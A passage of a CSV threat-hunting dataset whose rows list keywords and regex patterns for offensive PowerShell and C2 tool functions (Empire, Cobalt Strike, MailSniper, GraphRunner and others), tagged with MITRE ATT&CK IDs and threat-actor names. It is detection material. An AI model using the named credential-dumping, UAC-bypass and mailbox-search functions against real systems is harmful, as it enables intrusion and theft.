hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Invoke-ExcelMacroPivot*",".{0,1000}Invoke\-ExcelMacroPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExcelMacroPivot.ps1*",".{0,1000}Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExecuteMSBuild*",".{0,1000}Invoke\-ExecuteMSBuild.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ExecuteMSBuild.ps1*",".{0,1000}Invoke\-ExecuteMSBuild\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ExecutionCommand.json*",".{0,1000}Invoke\-ExecutionCommand\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExploitableLeakedHandlesCheck*",".{0,1000}Invoke\-ExploitableLeakedHandlesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Eyewitness*",".{0,1000}Invoke\-Eyewitness.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-FakeLogonScreen*",".{0,1000}Invoke\-FakeLogonScreen.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Farmer*",".{0,1000}Invoke\-Farmer.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invokefilefinder*",".{0,1000}invokefilefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-FileTransferWMImplant*",".{0,1000}Invoke\-FileTransferWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-FodHelperBypass*",".{0,1000}Invoke\-FodHelperBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ForgeUserAgent -Device *",".{0,1000}Invoke\-ForgeUserAgent\s\-Device\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-ForgeUserAgent*",".{0,1000}Invoke\-ForgeUserAgent.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Get-RBCD-Threaded*",".{0,1000}Invoke\-Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","To search all mailboxes in a domain","T1595 T1114 T1590 T1591 T1114","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GlobalMailSearch*",".{0,1000}Invoke\-GlobalMailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GlobalO365MailSearch*",".{0,1000}Invoke\-GlobalO365MailSearch.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-GoFetch*",".{0,1000}Invoke\-GoFetch.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*Invoke-Gopher*",".{0,1000}Invoke\-Gopher.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-GPPPasswordCheck*",".{0,1000}Invoke\-GPPPasswordCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-GrabTheHash*",".{0,1000}Invoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-GraphOpenInboxFinder -Tokens*",".{0,1000}Invoke\-GraphOpenInboxFinder\s\-Tokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphOpenInboxFinder*",".{0,1000}Invoke\-GraphOpenInboxFinder.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Checks each user?s inbox in a list to see if they are readable","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphRecon*",".{0,1000}Invoke\-GraphRecon.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Performs general recon for org info user settings directory sync settings etc","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-GraphRunner*",".{0,1000}Invoke\-GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Runs Invoke-GraphRecon - Get-AzureADUsers - Get-SecurityGroups - Invoke-DumpCAPS - Invoke-DumpApps - and then uses the default_detectors.json file to search with Invoke-SearchMailbox - Invoke-SearchSharePointAndOneDrive - and Invoke-SearchTeams.","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Grouper2*",".{0,1000}Invoke\-Grouper2.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Grouper3*",".{0,1000}Invoke\-Grouper3.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-HandleKatz*",".{0,1000}Invoke\-HandleKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Handlekatz*",".{0,1000}Invoke\-Handlekatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-HardenedUNCPathCheck*",".{0,1000}Invoke\-HardenedUNCPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-HijackableDllsCheck*",".{0,1000}Invoke\-HijackableDllsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-HiveDump*",".{0,1000}Invoke\-HiveDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-HiveNightmare.ps1*",".{0,1000}Invoke\-HiveNightmare\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-HoneypotBuster*",".{0,1000}Invoke\-HoneypotBuster.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","1","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*Invoke-HostEnum -*",".{0,1000}Invoke\-HostEnum\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 